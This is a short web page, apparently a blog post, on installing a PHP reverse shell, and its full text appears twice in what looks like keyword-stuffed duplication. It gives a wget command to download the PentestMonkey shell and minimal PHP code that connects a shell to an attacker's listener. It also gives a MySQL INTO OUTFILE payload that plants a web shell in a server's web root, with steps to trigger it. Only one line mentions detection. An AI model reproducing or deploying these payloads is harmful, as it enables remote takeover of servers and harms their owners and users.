The most common and reliable one is from PentestMonkey.

Download it:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Or create your own minimal version:

<?php
$ip = 'YOUR_IP';      // Your listener IP
$port = 4444;         // Your listener port
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>

If you have INTO OUTFILE privileges in MySQL:

SELECT '<?php $sock=fsockopen("192.168.1.100",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' INTO OUTFILE '/var/www/html/shell.php'

Then simply browse to http://target.com/shell.php.

Tools like openrasp or Imagick policies can detect fsockopen to external IPs.

Reverse Shell Php Install < 2025 >

The most common and reliable one is from PentestMonkey.

Download it:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Or create your own minimal version:

<?php
$ip = 'YOUR_IP';      // Your listener IP
$port = 4444;         // Your listener port
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>

If you have INTO OUTFILE privileges in MySQL:

SELECT '<?php $sock=fsockopen("192.168.1.100",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' INTO OUTFILE '/var/www/html/shell.php'

Then simply browse to http://target.com/shell.php. reverse shell php install

Tools like openrasp or Imagick policies can detect fsockopen to external IPs.

Recent Posts

Recent Comments

Reverse Shell Php Install < 2025 >

Archives